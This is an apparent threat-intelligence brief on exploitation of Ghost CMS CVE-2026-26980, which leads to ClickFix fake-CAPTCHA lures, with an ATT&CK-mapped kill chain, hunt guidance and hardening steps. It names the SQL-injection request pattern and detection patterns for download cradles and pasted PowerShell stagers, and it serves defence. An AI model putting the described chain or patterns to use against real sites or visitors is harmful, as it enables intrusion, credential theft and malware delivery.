ctipilot.ch

Home · Live brief · Daily brief 2026-05-25

Ghost CMS CVE-2026-26980 → ClickFix: the CMS-compromise-to-endpoint kill chain

notable vulnerability discovered 2026-05-25 05:00 UTC deep dive

Entities: SentinelOne

Part of run 2026-05-25-d675ef38 (intel · unknown)

Background. CVE-2026-26980 was disclosed and patched in Ghost 6.19.1 on 19 February 2026, and SentinelOne reported in-the-wild exploitation and detection guidance by 27 February (BleepingComputer, 2026-05-24). The May activity XLab documented is not a new bug but a large-scale weaponisation of the unpatched long tail of self-hosted instances, repurposing compromised editorial sites as a high-traffic, low-attributable delivery surface for ClickFix social engineering (XLab Qianxin, 2026-05-21). ClickFix / FakeCaptcha — tricking a user into pasting an attacker-supplied command into the Run dialog or a terminal — has been a tracked initial-access technique since 2024; what is notable here is the combination of a CVSS-9.4 pre-auth CMS flaw as the distribution mechanism with a fingerprinting/cloaking stage that keeps the lure invisible to non-targets and to casual review.

Kill chain → MITRE ATT&CK.

  • Initial access — T1190 Exploit Public-Facing Application. Unauthenticated boolean-based blind SQL injection through the Content API's slug filter parameter. No credentials, no user interaction — the request pattern the vendor mitigation keys on is a query string containing slug:[ (slug%3A%5B).
  • Credential access — T1552 Unsecured Credentials. The injection is used to read the admin API key out of Ghost's database. This key is a bearer token with full content-management scope, so its theft is the privilege pivot — there is no separate authentication step after extraction.
  • Content injection / defacement — T1659 Content Injection. With the admin key the attacker injects a lightweight JavaScript loader into published articles and/or theme templates, so the malicious code is served to every visitor from the site's own trusted origin.
  • Execution-guardrails cloaking — T1480 Execution Guardrails. The loader fetches a second-stage cloaking script that fingerprints each visitor and only proceeds for those matching the target profile (e.g. Windows desktop), so most visitors and most analysts never see the lure.
  • User execution — T1204.002 User Execution: Malicious File, chained to T1059.001 PowerShell / T1059.003 Windows Command Shell. Qualifying visitors are shown a fake Cloudflare "verify you are human" prompt in an overlay iframe instructing them to paste a supplied command into the Windows Run dialog (Win+R) or a terminal.
  • Payload delivery — T1105 Ingress Tool Transfer. The pasted command pulls follow-on payloads; XLab observed DLL loaders, JavaScript droppers, and an Electron-based sample named UtilifySetup.exe, leading to info-stealer / RAT capability.

Detection concepts (no IOCs). Two distinct hunt surfaces:

  • Server-side, for Ghost operators. Review web-server / reverse-proxy access logs for Content API requests to /ghost/api/content/ whose filter/slug parameter contains slug:[ (slug%3A%5B) or boolean-blind SQL artefacts (AND, CASE, time-delay primitives) — the vendor mitigation pattern is the highest-fidelity signal. In the Ghost admin audit trail, alert on unexpected article or theme modifications, and on any <script> element appearing in post content or theme files that has no editorial counterpart.
  • Client-side, for everyone (the product-agnostic, higher-value hunt). The ClickFix execution chain is independent of Ghost and is the artefact most defenders can actually catch: Sysmon Event ID 1 / Windows 4688 for cmd.exe or powershell.exe (especially with -EncodedCommand, clipboard-paste context, mshta, curl/certutil download cradles) whose parent process is a browser (chrome.exe, msedge.exe, firefox.exe, brave.exe) or explorer.exe immediately following a Win+R Run-dialog launch. Flag execution of unsigned Electron applications from user-writable paths. Enable PowerShell Script Block Logging (Event ID 4104) to capture the pasted stager body.

Hardening / mitigation.

  • Ghost: upgrade to 6.19.1 or later; until then block slug:[ / slug%3A%5B at the WAF and restrict the public Content API to trusted origins. Assume the admin API key was stolen on any internet-exposed instance — rotate it after patching and audit all posts and theme files for injected scripts.
  • Endpoint (the ClickFix surface, applies broadly): where operationally feasible, disable the Win+R Run dialog for standard users via the NoRun policy (GPO), deploy detection for clipboard-to-shell execution, and run user-awareness that any web page asking you to "paste this command to prove you are human" is an attack. Constrained Language Mode plus full PowerShell logging reduces the blast radius of a successful paste.

“Background.” — ctipilot v2 brief (migrated)

vulnerabilities actively-exploited pre-auth info-disclosure phishing infostealer global europe CVE-2026-26980